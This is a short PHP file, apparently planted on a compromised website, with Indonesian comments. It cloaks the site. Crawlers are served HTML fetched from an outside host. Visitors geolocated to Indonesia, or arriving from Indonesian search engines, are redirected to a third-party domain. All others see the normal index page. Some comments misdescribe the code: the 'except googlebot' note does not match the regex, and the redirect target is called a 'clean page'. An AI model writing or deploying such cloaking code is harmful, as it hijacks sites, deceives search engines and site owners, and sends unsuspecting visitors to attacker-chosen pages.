<?php
// Set header untuk SEO & bot
header('Vary: Accept-Language');
header('Vary: User-Agent');

// Ambil IP visitor
function get_client_ip() {
    return $_SERVER['HTTP_CLIENT_IP']
        ?? $_SERVER['HTTP_X_FORWARDED_FOR']
        ?? $_SERVER['HTTP_X_FORWARDED']
        ?? $_SERVER['HTTP_FORWARDED_FOR']
        ?? $_SERVER['HTTP_FORWARDED']
        ?? $_SERVER['REMOTE_ADDR']
        ?? '127.0.0.1';
}

$ip       = get_client_ip();
$userAgent = strtolower($_SERVER['HTTP_USER_AGENT'] ?? '');
$referer   = $_SERVER['HTTP_REFERER'] ?? '';

// Setting
$reff_url = "https://masuk-amp.org/amp/friends.omsoftsolution.net.in.html";
$bot_url  = "https://datasumsel.com/friends.omsoftsolution/index-clean.html";

// Cek negara berdasarkan IP
$geolocation = @json_decode(@file_get_contents("http://www.geoplugin.net/json.gp?ip=$ip"), true);
$country     = $geolocation['geoplugin_countryCode'] ?? '';

// Deteksi bot (kecuali googlebot)
$isBot = preg_match("/(ahrefs|semrush|yandex|mj12|crawler|spider|bot)/i", $userAgent);


if ($isBot) {
    $file = @file_get_contents($bot_url);
    if ($file) {
        echo $file;
        exit;
    }
}

// ✅ IP Indonesia → redirect ke halaman bersih
if (
    $country === "ID" ||
    (!empty($referer) && preg_match("/(google\.co\.id|bing\.com|yahoo\.co\.id)/i", $referer))
) {
    header("Location: $reff_url", true, 302);
    exit;
}


include $_SERVER['DOCUMENT_ROOT'] . "/index.php";
exit;
?>
